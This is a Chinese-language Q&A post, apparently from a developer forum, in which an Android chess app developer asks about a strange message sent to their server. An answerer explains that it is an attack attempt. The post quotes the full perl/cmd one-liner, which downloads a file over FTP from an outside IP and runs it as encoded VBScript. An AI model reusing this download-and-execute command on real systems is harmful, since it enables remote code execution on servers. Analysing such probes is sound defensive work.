我在Android上制作了Chess App Online。
我监控服务器在客户端调用.accept()后收到的所有消息,并且我读了BufferedReader()。
我最近收到一条来自未知用户的非常奇怪的消息,它与我得到的通常消息格式完全不匹配。
这就是服务器收到的内容:
?2 28 \perl.exe -esystem('cmd.exe /c echo bin>f&echo get azb.zip %temp%\\z.zip>>f&echo bye>>f&ftp -A -s:f 112.213.127.52 &cscript.exe /b /e:VBScript.Encode %temp%\\z.zip 579562847 macu://58.238.143.25:88/h')
有谁知道这是什么?如果危险,我该怎么办?
答案 0 :(得分:12)
事实上,这似乎是一次攻击(或一次尝试)。如果我分开排队,我将结束以下内容:
"个人"尝试在您的服务器上执行一些代码。它首先创建一个名为f的文件,其中包含以下内容:
bin
get azb.zip %temp%\z.zip
bye
然后它运行ftp命令并将该文件作为输入,即它连接到112.213.127.52并获取文件azb.zip并将其存储在本地(在您的服务器上)%temp%\z.zip
最后运行
cscript.exe /b /e:VBScript.Encode %temp%\z.zip 579562847 macu://58.238.143.25:88/h
整个片段被包裹在perl单行内容中。 Perl的system()函数只是执行给它的外部命令,在本例中是cmd.exe。我认为这样做是因为您的服务器不太可能运行cmd.exe但可能运行perl,因为perl经常用于服务器脚本(例如cgi脚本)。
好消息是:仅在满足以下所有条件时才会起作用:
perl.exe cmd.exe cscript.exe %temp% This site说地址58.238.143.25来自韩国,112.213.127.52来自香港。
我不在乎。这是对基于Windows的服务器的攻击。是你的吗?